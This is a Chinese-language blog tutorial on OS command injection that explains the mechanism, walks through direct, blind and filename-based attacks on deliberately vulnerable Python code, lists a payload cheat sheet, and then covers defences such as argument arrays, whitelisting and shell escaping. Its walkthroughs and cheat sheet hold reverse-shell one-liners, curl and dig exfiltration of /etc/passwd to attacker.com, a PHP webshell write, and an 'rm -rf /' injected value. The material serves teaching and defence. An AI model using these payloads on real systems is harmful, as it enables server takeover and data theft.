<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="命令注入（OS Command Injection）：原理、攻击与防御, 是小竹不是小猪">
    <meta name="description" content="一、核心原理命令注入（OS Command Injection）的本质是用户可控数据被操作系统 Shell 当作命令执行。
这与 SQL 注入、XSS 的逻辑完全同构——SQL 注入是用户输入被数据库引擎当作 SQL 指令执行，XSS 是用">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>命令注入（OS Command Injection）：原理、攻击与防御 | 是小竹不是小猪</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">是小竹不是小猪</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">是小竹不是小猪</div>
        <div class="logo-desc">
            
            每一年都奔走在自己的热爱里
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/zhuyanzhen-lab/zhuyanzhen-lab.github.io" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/zhuyanzhen-lab/zhuyanzhen-lab.github.io" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/25.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">命令注入（OS Command Injection）：原理、攻击与防御</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">安全</span>
                            </a>
                        
                            <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">Web安全</span>
                            </a>
                        
                            <a href="/tags/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/">
                                <span class="chip bg-color">命令注入</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-08-08
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h3 id="一、核心原理"><a href="#一、核心原理" class="headerlink" title="一、核心原理"></a>一、核心原理</h3><p>命令注入（OS Command Injection）的本质是<strong>用户可控数据被操作系统 Shell 当作命令执行</strong>。</p>
<p>这与 SQL 注入、XSS 的逻辑完全同构——SQL 注入是用户输入被数据库引擎当作 SQL 指令执行，XSS 是用户输入被浏览器当作 JavaScript 执行，命令注入是用户输入被操作系统 Shell 当作系统命令执行。三者共享同一个根源：<strong>数据与指令的边界混淆</strong>。</p>
<p>但命令注入的危害远大于前两者。SQL 注入影响的是数据库，XSS 影响的是浏览器，而命令注入直接影响操作系统——攻击者以 Web 应用进程的权限执行任意系统命令。如果 Web 应用以 root 权限运行，攻击者就获得了 root 权限。</p>
<p>命令注入发生的前提是：应用代码将用户输入拼接到系统命令字符串中，然后通过 <code>system()</code>、<code>exec()</code>、<code>popen()</code>、<code>subprocess</code> 等函数执行。Shell 解析命令字符串时，遇到 <code>;</code>、<code>|</code>、<code>&amp;&amp;</code>、<code>||</code>、<code>$()</code>、反引号等元字符，会改变命令的执行逻辑。</p>
<hr>
<h3 id="二、三种命令注入完整攻击实例"><a href="#二、三种命令注入完整攻击实例" class="headerlink" title="二、三种命令注入完整攻击实例"></a>二、三种命令注入完整攻击实例</h3><h4 id="2-1-直接命令注入：有回显的完整利用"><a href="#2-1-直接命令注入：有回显的完整利用" class="headerlink" title="2.1 直接命令注入：有回显的完整利用"></a>2.1 直接命令注入：有回显的完整利用</h4><p><strong>场景：</strong> 一个网络工具网站，提供 ping 功能。用户输入域名，服务端执行 <code>ping</code> 命令并返回结果。</p>
<pre><code>https://tools.com/ping?host=example.com
</code></pre>
<p><strong>第一步：确认注入点。</strong> 攻击者输入 <code>example.com</code>，服务端返回 ping 结果。抓包分析，确认服务端确实执行了系统命令。</p>
<p>服务端代码大致如下：</p>
<pre><code class="python"># 危险写法：用户输入直接拼入命令
import os
host = request.args.get(&#39;host&#39;)
output = os.popen(f&#39;ping -c 4 &#123;host&#125;&#39;).read()
return output
</code></pre>
<p><strong>第二步：测试注入。</strong> 攻击者输入 <code>example.com; id</code>，服务端执行 <code>ping -c 4 example.com; id</code>。Shell 将 <code>;</code> 视为命令分隔符，先执行 <code>ping</code>，再执行 <code>id</code>。返回结果中出现了 <code>uid=33(www-data) gid=33(www-data)</code>，确认命令注入存在。</p>
<p><strong>第三步：读取敏感文件。</strong></p>
<pre><code>example.com; cat /etc/passwd
</code></pre>
<p>Shell 执行 <code>ping -c 4 example.com; cat /etc/passwd</code>，返回系统用户列表。</p>
<pre><code>example.com; cat /var/www/html/config.py
</code></pre>
<p>读取应用配置文件，可能包含数据库密码、API 密钥。</p>
<p><strong>第四步：获取反向 Shell。</strong> 攻击者在自己的服务器上启动监听：</p>
<pre><code class="bash"># 攻击者机器上
nc -lvnp 4444
</code></pre>
<p>然后通过命令注入发起反向连接：</p>
<pre><code>example.com; bash -i &gt;&amp; /dev/tcp/attacker.com/4444 0&gt;&amp;1
</code></pre>
<p>Shell 执行后，目标服务器的 bash 进程连接到攻击者的 <code>nc</code> 监听端口。攻击者获得了一个交互式 Shell，可以像 SSH 登录一样操作目标服务器。</p>
<p><strong>完整数据流：</strong></p>
<pre><code>攻击者提交 host=example.com; bash -i &gt;&amp; /dev/tcp/attacker.com/4444 0&gt;&amp;1
  → 服务端拼入命令：ping -c 4 example.com; bash -i &gt;&amp; /dev/tcp/attacker.com/4444 0&gt;&amp;1
  → Shell 解析 ; 分隔符，执行第二条命令
  → bash 建立到 attacker.com:4444 的 TCP 连接
  → 攻击者的 nc 接收到连接
  → 攻击者获得目标服务器的交互式 Shell
  → 可以执行任意系统命令，完全控制服务器
</code></pre>
<p><strong>为什么这能成功？</strong> 因为 Shell 解析命令字符串时，<code>;</code> 是命令分隔符，<code>|</code> 是管道符，<code>&amp;&amp;</code> 是逻辑与，<code>$()</code> 是命令替换。这些元字符改变了命令的结构，让攻击者注入的内容变成了独立的命令被执行。</p>
<h4 id="2-2-盲命令注入：无回显的利用"><a href="#2-2-盲命令注入：无回显的利用" class="headerlink" title="2.2 盲命令注入：无回显的利用"></a>2.2 盲命令注入：无回显的利用</h4><p><strong>场景：</strong> 一个日志分析工具，用户输入日志文件路径，服务端用 <code>grep</code> 搜索关键词并将结果写入临时文件。前端只显示”处理完成”，不显示命令输出。</p>
<pre><code class="python"># 无回显：结果写入文件，不返回给用户
import os
log_file = request.args.get(&#39;file&#39;)
os.system(f&#39;grep &quot;ERROR&quot; /var/log/&#123;log_file&#125; &gt; /tmp/result.txt&#39;)
return &#39;处理完成&#39;
</code></pre>
<p><strong>第一步：确认盲注入存在。</strong> 攻击者输入 <code>app.log; sleep 10</code>。如果页面在 10 秒后才返回”处理完成”，说明 <code>sleep</code> 命令被执行了，命令注入存在。</p>
<pre><code>app.log; sleep 10    → 页面 10 秒后返回 → 确认注入
app.log; sleep 0     → 页面立即返回   → 对照验证
</code></pre>
<p><strong>第二步：通过 DNS 外带数据。</strong> 攻击者无法直接看到命令输出，但可以让服务端发起 DNS 查询，通过 DNS 记录传递数据：</p>
<pre><code>app.log; curl http://$(whoami).attacker.com
</code></pre>
<p>Shell 执行 <code>whoami</code>，将结果作为子域名发送到 <code>attacker.com</code>。攻击者在 DNS 日志中看到 <code>www-data.attacker.com</code> 的查询记录，得知命令以 <code>www-data</code> 用户执行。</p>
<p><strong>第三步：通过 HTTP 外带数据。</strong> 比 DNS 更灵活，可以传递大量数据：</p>
<pre><code>app.log; curl http://attacker.com/log?data=$(cat /etc/passwd | base64)
</code></pre>
<p>Shell 读取 <code>/etc/passwd</code>，Base64 编码后作为 URL 参数发送到攻击者服务器。攻击者在 HTTP 日志中解码获取数据。</p>
<p><strong>第四步：写入 WebShell。</strong> 即使没有回显，攻击者仍然可以写入文件：</p>
<pre><code>app.log; echo &#39;&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&#39; &gt; /var/www/html/shell.php
</code></pre>
<p>攻击者访问 <code>https://target.com/shell.php?cmd=id</code>，验证 WebShell 是否写入成功。</p>
<p><strong>完整数据流（HTTP 外带）：</strong></p>
<pre><code>攻击者提交 file=app.log; curl http://attacker.com/log?data=$(cat /etc/passwd | base64)
  → 服务端执行：grep &quot;ERROR&quot; /var/log/app.log; curl http://attacker.com/log?data=$(cat /etc/passwd | base64)
  → grep 执行完成（攻击者不关心结果）
  → curl 读取 /etc/passwd，Base64 编码
  → curl 向 attacker.com 发起 HTTP GET 请求，携带编码后的数据
  → 攻击者在 HTTP 日志中获取 Base64 数据，解码得到 /etc/passwd 内容
</code></pre>
<p><strong>盲注入的关键思路：</strong> 虽然没有直接回显，但攻击者可以通过时间延迟确认漏洞存在，通过 DNS/HTTP 外带窃取数据，通过写入文件获取持久化访问。无回显不等于无危害。</p>
<h4 id="2-3-间接命令注入：通过文件名和环境变量"><a href="#2-3-间接命令注入：通过文件名和环境变量" class="headerlink" title="2.3 间接命令注入：通过文件名和环境变量"></a>2.3 间接命令注入：通过文件名和环境变量</h4><p><strong>场景：</strong> 一个文件处理服务，用户上传文件，服务端用 <code>file</code> 命令检测文件类型，然后用 <code>convert</code>（ImageMagick）生成缩略图。</p>
<pre><code class="python">import subprocess
filename = secure_filename(uploaded_file.filename)  # 只过滤了路径分隔符
filepath = f&#39;/tmp/uploads/&#123;filename&#125;&#39;
uploaded_file.save(filepath)

# 危险：文件名被传入 shell 命令
subprocess.call(f&#39;file &#123;filepath&#125;&#39;, shell=True)
subprocess.call(f&#39;convert &#123;filepath&#125; -thumbnail 200x200 /tmp/thumb_&#123;filename&#125;&#39;, shell=True)
</code></pre>
<p><strong>第一步：构造恶意文件名。</strong> 攻击者上传文件，文件名为 <code>test.jpg; id</code>。<code>secure_filename()</code> 只过滤了 <code>../</code> 等路径分隔符，没有过滤 <code>;</code>。</p>
<p><strong>第二步：命令注入触发。</strong> 服务端执行：</p>
<pre><code class="bash">file /tmp/uploads/test.jpg; id
convert /tmp/uploads/test.jpg; id -thumbnail 200x200 /tmp/thumb_test.jpg; id
</code></pre>
<p><code>;</code> 后面的 <code>id</code> 被当作独立命令执行。</p>
<p><strong>另一种间接注入：通过环境变量。</strong> 某些应用使用 <code>eval</code> 或模板引擎处理配置，配置值来自环境变量，而环境变量可以被用户间接控制：</p>
<pre><code class="python"># 危险：eval 执行包含用户数据的字符串
import os
template = os.environ.get(&#39;GREETING&#39;, &#39;Hello&#39;)
os.system(f&#39;echo &quot;&#123;template&#125; &#123;username&#125;&quot;&#39;)
# 如果 template 被注入为 $(whoami)，命令变成：
# echo &quot;$(whoami) admin&quot;
</code></pre>
<p><strong>通过 Git 配置注入：</strong> 如果应用执行 <code>git</code> 命令且参数来自用户输入：</p>
<pre><code class="python"># 用户输入 repo_url = &quot;https://github.com/user/repo; malicious_command&quot;
subprocess.call(f&#39;git clone &#123;repo_url&#125; /tmp/repo&#39;, shell=True)
</code></pre>
<p><strong>完整数据流（文件名注入）：</strong></p>
<pre><code>攻击者上传文件，文件名: test.jpg; curl http://attacker.com/$(whoami)
  → 文件保存到 /tmp/uploads/test.jpg; curl http://attacker.com/$(whoami)
  → 服务端执行：file /tmp/uploads/test.jpg; curl http://attacker.com/$(whoami)
  → Shell 解析 ; 分隔符
  → file 命令正常执行（处理 test.jpg 部分）
  → curl 执行 whoami，将结果发送到 attacker.com
  → 攻击者通过 DNS/HTTP 日志得知执行用户
</code></pre>
<p><strong>间接注入的隐蔽性：</strong> 开发者可能认为”文件名是用户上传的，不是直接输入的”，忽略了文件名也是用户可控数据。任何传入 Shell 命令的用户数据——无论是表单参数、文件名、HTTP 头、环境变量——都是潜在的注入点。</p>
<hr>
<h3 id="三、Shell-元字符与注入语法"><a href="#三、Shell-元字符与注入语法" class="headerlink" title="三、Shell 元字符与注入语法"></a>三、Shell 元字符与注入语法</h3><p>理解命令注入需要理解 Shell 如何解析命令字符串。以下是所有可以改变命令结构的元字符：</p>
<h4 id="3-1-命令分隔和链接"><a href="#3-1-命令分隔和链接" class="headerlink" title="3.1 命令分隔和链接"></a>3.1 命令分隔和链接</h4><pre><code class="bash"># 分号：顺序执行，无论前一条是否成功
cmd1; cmd2            # cmd1 执行完后执行 cmd2

# 逻辑与：前一条成功才执行后一条
cmd1 &amp;&amp; cmd2          # cmd1 成功（返回 0）才执行 cmd2

# 逻辑或：前一条失败才执行后一条
cmd1 || cmd2          # cmd1 失败（返回非 0）才执行 cmd2

# 管道：前一条的输出作为后一条的输入
cmd1 | cmd2           # cmd1 的标准输出传给 cmd2 的标准输入

# 后台执行
cmd &amp;                 # cmd 在后台执行
</code></pre>
<p>攻击者最常用的分隔符是 <code>;</code>（无条件执行）和 <code>|</code>（将用户输入通过管道传给另一个命令）。<code>&amp;&amp;</code> 和 <code>||</code> 需要条件判断，使用场景较少。</p>
<h4 id="3-2-命令替换"><a href="#3-2-命令替换" class="headerlink" title="3.2 命令替换"></a>3.2 命令替换</h4><pre><code class="bash"># $() 形式：执行括号中的命令，将输出替换到原位置
echo $(whoami)        # 输出: www-data

# 反引号形式（旧语法）
echo `whoami`          # 输出: www-data
</code></pre>
<p>命令替换允许在命令参数中嵌套执行其他命令。攻击者可以用它读取数据并嵌入到 URL 中实现外带。</p>
<h4 id="3-3-重定向"><a href="#3-3-重定向" class="headerlink" title="3.3 重定向"></a>3.3 重定向</h4><pre><code class="bash"># 输出重定向：将命令输出写入文件
cmd &gt; file            # 覆盖写入
cmd &gt;&gt; file           # 追加写入

# 输入重定向：从文件读取作为命令输入
cmd &lt; file

# 标准错误重定向
cmd 2&gt; error.log

# /dev/tcp：Bash 特殊的 TCP 连接（用于反向 Shell）
bash -i &gt;&amp; /dev/tcp/attacker.com/4444 0&gt;&amp;1
</code></pre>
<p>重定向是写入 WebShell 和建立反向 Shell 的关键。</p>
<h4 id="3-4-注入-payload-速查"><a href="#3-4-注入-payload-速查" class="headerlink" title="3.4 注入 payload 速查"></a>3.4 注入 payload 速查</h4><pre><code class="bash"># 基础分隔
; id
| id
&amp;&amp; id
|| id

# 命令替换（嵌入参数中）
$(id)
`id`

# 换行符（某些场景下 \n 也能分隔命令）
%0a id

# 反向 Shell
; bash -i &gt;&amp; /dev/tcp/attacker.com/4444 0&gt;&amp;1
; python3 -c &#39;import socket,subprocess,os;s=socket.socket();s.connect((&quot;attacker.com&quot;,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([&quot;/bin/bash&quot;,&quot;-i&quot;])&#39;

# 数据外带
; curl http://attacker.com/log?data=$(cat /etc/passwd | base64)
; dig $(whoami).attacker.com

# 写入文件
; echo &#39;&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&#39; &gt; /var/www/html/shell.php

# 读取文件并通过 HTTP 外带
; curl -F &quot;file=@/etc/passwd&quot; http://attacker.com/upload
</code></pre>
<hr>
<h3 id="四、防御策略详解"><a href="#四、防御策略详解" class="headerlink" title="四、防御策略详解"></a>四、防御策略详解</h3><h4 id="4-1-避免调用系统命令：最根本的防御"><a href="#4-1-避免调用系统命令：最根本的防御" class="headerlink" title="4.1 避免调用系统命令：最根本的防御"></a>4.1 避免调用系统命令：最根本的防御</h4><p><strong>如果不需要执行系统命令，就不要调用。</strong> 大多数需要用系统命令实现的功能，都有对应的编程语言原生 API：</p>
<pre><code class="python"># 危险：调用系统命令列出目录内容
output = os.popen(f&#39;ls &#123;directory&#125;&#39;).read()

# 安全：使用 Python 原生 API
import os
files = os.listdir(directory)
</code></pre>
<pre><code class="python"># 危险：调用系统命令创建目录
os.system(f&#39;mkdir &#123;dirname&#125;&#39;)

# 安全：使用 Python 原生 API
os.makedirs(dirname, exist_ok=True)
</code></pre>
<pre><code class="python"># 危险：调用系统命令发 HTTP 请求
os.system(f&#39;curl &#123;url&#125;&#39;)

# 安全：使用 requests 库
import requests
response = requests.get(url)
</code></pre>
<pre><code class="java">// 危险：Runtime.exec 执行系统命令
Runtime.getRuntime().exec(&quot;ping &quot; + userInput);

// 安全：使用 Java 原生网络 API
InetAddress address = InetAddress.getByName(hostname);
boolean reachable = address.isReachable(5000);
</code></pre>
<p><strong>为什么这是最根本的防御？</strong> 因为不调用系统命令就不存在命令注入的攻击面。没有 Shell 参与，就没有元字符解析，就没有注入的可能。</p>
<p><strong>常见可以用原生 API 替代的场景：</strong></p>
<p>文件操作（<code>ls</code>、<code>cp</code>、<code>mv</code>、<code>mkdir</code>、<code>rm</code>）→ <code>os.listdir</code>、<code>shutil.copy</code>、<code>os.rename</code>、<code>os.makedirs</code>。</p>
<p>网络请求（<code>curl</code>、<code>wget</code>）→ <code>requests</code>、<code>urllib</code>、<code>HttpClient</code>。</p>
<p>进程管理（<code>kill</code>、<code>ps</code>）→ <code>os.kill</code>、<code>psutil</code>。</p>
<p>压缩解压（<code>tar</code>、<code>zip</code>）→ <code>tarfile</code>、<code>zipfile</code>。</p>
<p>图像处理（<code>convert</code>）→ <code>Pillow</code>。</p>
<h4 id="4-2-参数化调用：无法避免时的安全做法"><a href="#4-2-参数化调用：无法避免时的安全做法" class="headerlink" title="4.2 参数化调用：无法避免时的安全做法"></a>4.2 参数化调用：无法避免时的安全做法</h4><p>如果确实需要调用外部程序（如调用 <code>ffmpeg</code> 处理视频、调用 <code>gpg</code> 加密文件），<strong>不要通过 Shell 执行，使用参数数组的方式调用</strong>：</p>
<pre><code class="python">import subprocess

# 危险：通过 Shell 执行，用户输入被 Shell 解析
subprocess.call(f&#39;ffmpeg -i &#123;input_file&#125; -vf scale=200:-1 &#123;output_file&#125;&#39;, shell=True)

# 安全：参数数组，不经过 Shell，用户输入不会被解析为命令
subprocess.run([
    &#39;ffmpeg&#39;,
    &#39;-i&#39;, input_file,
    &#39;-vf&#39;, &#39;scale=200:-1&#39;,
    output_file
], check=True, capture_output=True)
</code></pre>
<p><strong>为什么参数数组安全？</strong> 因为 <code>subprocess.run(list)</code> 不调用 Shell，而是直接通过 <code>execve()</code> 系统调用执行目标程序。用户输入作为参数传递给 <code>ffmpeg</code>，不会被 Shell 解析。即使 <code>input_file</code> 的值是 <code>test; rm -rf /</code>，<code>ffmpeg</code> 只会把它当作一个文件名（不存在的文件名，会报错），不会执行 <code>rm</code> 命令。</p>
<pre><code class="java">// Java: ProcessBuilder 使用参数数组，不经过 Shell
ProcessBuilder pb = new ProcessBuilder(
    &quot;ffmpeg&quot;,
    &quot;-i&quot;, inputFile,
    &quot;-vf&quot;, &quot;scale=200:-1&quot;,
    outputFile
);
Process process = pb.start();
</code></pre>
<pre><code class="php">// PHP: escapeshellarg 对参数做 Shell 转义
$input = escapeshellarg($userInput);
$output = escapeshellarg($outputFile);
exec(&quot;ffmpeg -i $input -vf scale=200:-1 $output&quot;);
</code></pre>
<p><strong>关键区别：</strong> <code>shell=True</code> 意味着命令字符串会被 Shell 解析（<code>/bin/sh -c &quot;...&quot;</code>），所有元字符生效。<code>shell=False</code>（Python 默认值）意味着直接执行目标程序，没有 Shell 参与，元字符无效。</p>
<h4 id="4-3-输入白名单验证"><a href="#4-3-输入白名单验证" class="headerlink" title="4.3 输入白名单验证"></a>4.3 输入白名单验证</h4><p>如果必须将用户输入拼入命令字符串，先做严格的白名单验证：</p>
<pre><code class="python">import re

def validate_hostname(hostname):
    # 只允许字母、数字、点号、连字符
    if not re.match(r&#39;^[a-zA-Z0-9.\-]+$&#39;, hostname):
        raise ValueError(&quot;Invalid hostname&quot;)
    # 额外校验：必须是合法的域名格式
    if not re.match(r&#39;^[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?)*$&#39;, hostname):
        raise ValueError(&quot;Invalid hostname format&quot;)
    return hostname

# 使用
hostname = validate_hostname(request.args.get(&#39;host&#39;))
# 通过验证后，hostname 中不包含任何 Shell 元字符
output = subprocess.run([&#39;ping&#39;, &#39;-c&#39;, &#39;4&#39;, hostname], capture_output=True, text=True)
</code></pre>
<p><strong>白名单的思路：</strong> 只允许已知安全的字符，拒绝一切其他字符。对于域名，只允许字母数字和 <code>.</code>、<code>-</code>；对于 IP 地址，只允许数字和 <code>.</code>；对于文件名，只允许字母数字和 <code>.</code>、<code>-</code>、<code>_</code>。</p>
<p><strong>黑名单为什么不可靠？</strong> 因为 Shell 元字符太多（<code>;</code>、<code>|</code>、<code>&amp;</code>、<code>$</code>、<code>`</code>、<code>(</code>、<code>)</code>、<code>&#123;</code>、<code>&#125;</code>、<code>&lt;</code>、<code>&gt;</code>、<code>?</code>、<code>*</code>、<code>[</code>、<code>]</code>、<code>~</code>、<code>!</code>、<code>#</code>、换行符、空格……），黑名单几乎不可能穷举。而且不同 Shell（bash、sh、zsh、csh）的元字符集合不同，不同操作系统的行为也不同。</p>
<h4 id="4-4-Shell-转义"><a href="#4-4-Shell-转义" class="headerlink" title="4.4 Shell 转义"></a>4.4 Shell 转义</h4><p>如果实在无法避免通过 Shell 执行命令，且用户输入必须拼入命令字符串，使用 Shell 转义函数对用户输入进行转义：</p>
<pre><code class="python">import shlex

# shlex.quote 将字符串用单引号包裹，并转义内部的单引号
user_input = &quot;test; rm -rf /&quot;
safe_input = shlex.quote(user_input)
# safe_input = &quot;&#39;test; rm -rf /&#39;&quot;
# 单引号内的所有字符都是字面量，Shell 不会解析

os.system(f&#39;echo &#123;safe_input&#125;&#39;)
